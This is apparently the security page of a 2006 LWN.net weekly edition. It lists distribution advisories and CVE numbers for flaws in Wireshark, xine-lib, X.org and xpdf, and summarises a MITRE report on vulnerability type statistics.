Package(s):wireshark CVE #(s):CVE-2006-4330 CVE-2006-4331 CVE-2006-4332 CVE-2006-4333
Created:August 25, 2006 Updated:November 2, 2006
Description: There are multiple problems in Wireshark, versions 0.7.9 to 0.99.2.
Alerts:
Red Hat RHSA-2006:0658-01 wireshark 2006-09-12
Debian DSA-1171-1 ethereal 2006-09-07
Gentoo 200608-26 wireshark 2006-08-29
Fedora FEDORA-2006-936 wireshark 2006-08-25
Mandriva MDKSA-2006:152 wireshark 2006-08-25
rPath rPSA-2006-0158-1 wireshark 2006-08-25

Comments (none posted)

xine-lib: code execution

Package(s):xine-lib CVE #(s):CVE-2006-4799
Created:October 4, 2006 Updated:November 21, 2006
Description: The xine-lib package does not properly validate AVI headers, enabling an attacker to run arbitrary code via a specially crafted AVI file.
Alerts:
Debian DSA-1215-1 xine-lib 2006-11-20
Ubuntu USN-358-1 ffmpeg, xine-lib 2006-10-04

Comments (none posted)

xine-lib: buffer overflow

Package(s):xine-lib CVE #(s):CVE-2006-1664
Created:April 27, 2006 Updated:February 27, 2008
Description: xine-lib does an improper input data boundary check on MPEG streams. A specially crafted MPEG file can be created that can cause arbitrary code execution when the file is accessed.
Alerts:
Gentoo 200802-12 xine-lib 2008-02-26
Gentoo 200604-16 xine-lib 2006-04-26

Comments (none posted)

xine-ui: format string vulnerabilities

Package(s):xine-ui CVE #(s):CVE-2006-2230
Created:June 9, 2006 Updated:January 24, 2007
Description: Several format string vulnerabilities have been discovered in xine-ui, the user interface of the xine video player, which may cause a denial of service.
Alerts:
Gentoo 200701-18 xine-ui 2007-01-23
Debian DSA-1093-1 xine-ui 2006-06-08

Comments (none posted)

X.org: local privilege escalations

Package(s):xorg-x11 CVE #(s):CVE-2006-4447
Created:August 28, 2006 Updated:April 30, 2007
Description: Several X.org libraries and X.org itself contain system calls to set*uid() functions, without checking their result. Local users could deliberately exceed their assigned resource limits and elevate their privileges after an unsuccessful set*uid() system call. This requires resource limits to be enabled on the machine.
Alerts:
Gentoo 200704-22 beast 2007-04-27
Mandriva MDKSA-2006:160 xorg-x11 2006-08-31
Gentoo 200608-25 xdm 2006-08-28

Comments (none posted)

X.Org: buffer overflow

Package(s):xorg-x11-server xorg-x11 CVE #(s):CVE-2006-1526
Created:May 3, 2006 Updated:January 10, 2007
Description: There is a buffer overflow in the Xrender extension of the X.Org server; any process which is able to connect to the server may be able to exploit this overflow to run arbitrary code. Since the X server runs as root on most systems, this vulnerability could be exploited to gain root access. See the X.Org advisory for more information.
Alerts:
Fedora-Legacy FLSA:190777 x.org 2006-06-06
Trustix TSLSA-2006-0024 clamav, cyrus-sasl, kernel, libtiff, rsync, xorg-x11 2006-05-05
Mandriva MDKSA-2006:081-1 xorg-x11 2006-05-04
Ubuntu USN-280-1 xorg 2006-05-04
Slackware SSA:2006-123-01 x11 2006-05-04
Red Hat RHSA-2006:0451-01 X.org 2006-05-04
SuSE SUSE-SA:2006:023 xorg-x11-server 2006-05-03
Mandriva MDKSA-2006:081 xorg-x11 2006-05-02
Gentoo 200605-02 xorg-x11 2006-05-02

Comments (none posted)

xorg-x11: privilege escalation

Package(s):xorg-x11 xfree86 CVE #(s):CVE-2006-3739 CVE-2006-3740
Created:September 12, 2006 Updated:December 14, 2006
Description: iDefense reported two integer overflow flaws in the way the X.org server processed CID font files. A malicious authorized client could exploit this issue to cause a denial of service (crash) or potentially execute arbitrary code with root privileges on the X.org server.
Alerts:
Mandriva MDKSA-2006:164-2 xorg-x11 2006-12-14
Mandriva MDKSA-2006:164-1 xorg-x11 2006-11-17
Debian DSA-1193-1 xfree86 2006-10-09
SuSE SUSE-SR:2006:023 X.org MySQL xmms-plugins gnutls squirrelmail xscreensaver newpg bind 2006-09-27
Slackware SSA:2006-259-01 x11 2006-09-18
Mandriva MDKSA-2006:164 xorg-x11 2006-09-14
Gentoo 200609-07 libXfont 2006-09-13
Ubuntu USN-344-1 libxfont, xorg 2006-09-12
Red Hat RHSA-2006:0666-01 XFree86 2006-09-12
Red Hat RHSA-2006:0665-01 X.org 2006-09-12
rPath rPSA-2006-0167-1 x11 2006-09-12

Comments (none posted)

xpdf: buffer overflow

Package(s):xpdf CVE #(s):CAN-2005-0064
Created:January 19, 2005 Updated:March 15, 2007
Description: iDEFENSE has found yet another xpdf buffer overflow; see this advisory for details.
Alerts:
Fedora FEDORA-2007-1219 cups 2007-03-14
Gentoo 200506-06 libextractor 2005-06-09
Red Hat RHSA-2005:026-01 tetex 2005-03-16
Red Hat RHSA-2005:066-01 kdegraphics 2005-02-15
Red Hat RHSA-2005:057-01 gpdf 2005-02-15
Red Hat RHSA-2005:053-01 CUPS 2005-02-15
Red Hat RHSA-2005:034-01 xpdf 2005-02-15
Fedora-Legacy FLSA:2353 gpdf 2005-02-10
Fedora-Legacy FLSA:2352 Xpdf 2005-02-10
Gentoo 200502-10 pdftohtml 2005-02-09
Red Hat RHSA-2005:049-01 CUPS 2005-02-01
SuSE SUSE-SR:2005:002 xpdf awstats mpg123 squirrelmail thunderbird mailman xine-lib 2005-01-26
Red Hat RHSA-2005:059-01 Xpdf 2005-01-26
Mandrake MDKSA-2005:020 kdegraphics 2005-01-25
Mandrake MDKSA-2005:019 koffice 2005-01-25
Mandrake MDKSA-2005:016 gpdf 2005-01-25
Mandrake MDKSA-2005:021 tetex 2005-01-25
Mandrake MDKSA-2005:018 cups 2005-01-25
Mandrake MDKSA-2005:017 xpdf 2005-01-25
Fedora FEDORA-2005-061 kdegraphics 2005-01-25
Fedora FEDORA-2005-062 kdegraphics 2005-01-25
Fedora FEDORA-2005-059 koffice 2005-01-25
Fedora FEDORA-2005-060 koffice 2005-01-25
Conectiva CLA-2005:921 xpdf 2005-01-25
Fedora FEDORA-2004-049 tetex 2005-01-24
Fedora FEDORA-2004-048 tetex 2005-01-24
Gentoo 200501-32 kpdf koffice 2005-01-23
Gentoo 200501-31 tetex 2005-01-23
Gentoo 200501-30 cups 2005-01-22
Gentoo 200501-28 xpdf 2005-01-21
Fedora FEDORA-2005-052 xpdf 2005-01-20
Fedora FEDORA-2005-051 xpdf 2005-01-20
Ubuntu USN-64-1 cupsys 2005-01-19
Debian DSA-645-1 cupsys 2005-01-19
Debian DSA-648-1 xpdf 2005-01-19

Comments (1 posted)

xpdf: integer overflows

Package(s):xpdf, poppler, cupsys, tetex-bin CVE #(s):CVE-2005-3624 CVE-2005-3625 CVE-2005-3626 CVE-2005-3627
Created:January 5, 2006 Updated:November 30, 2006
Description: xpdf has a number of integer overflows. A remote attacker can trick a user into opening a maliciously crafted pdf file, allowing the attacker to execute code with the privileges of the local user. This also affects the Poppler library, cupsys and tetex-bin.
Alerts:
Fedora FEDORA-2006-1220 cups 2006-11-30
Debian DSA-932-1 xpdf 2006-01-09
Debian DSA-931-1 xpdf 2006-01-09
Ubuntu USN-236-2 kdegraphics, koffice 2006-01-09
Mandriva MDKSA-2006:008 koffice 2006-01-06
Mandriva MDKSA-2006:006 gpdf 2006-01-05
Mandriva MDKSA-2006:005 xpdf 2006-01-05
Mandriva MDKSA-2006:004 pdftohtml 2006-01-05
Mandriva MDKSA-2006:003 poppler 2006-01-05
Ubuntu USN-236-1 xpdf, poppler, cupsys, tetex-bin 2006-01-05

Comments (none posted)

Resources

Report: Vulnerability type distributions in CVE

Steve Christey at MITRE has done a bunch of statistics crunching on five years of CVE vulnerability entries. The resulting report makes interesting reading. "Format string vulnerabilities appear more frequently in open source. There are probably several factors. First, susceptible API library calls such as printf() are easily found in source code using crude methods, whereas binary reverse engineering techniques are not conducted by many researchers (this might also be an explanation for symbolic link issues). Second, many format string problems seem to occur in rarely-triggered error conditions, which makes them more difficult to test with black box methods."

Comments (12 posted)

Page editor: Jonathan Corbet
Next page: Kernel development>>


Copyright © 2006, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds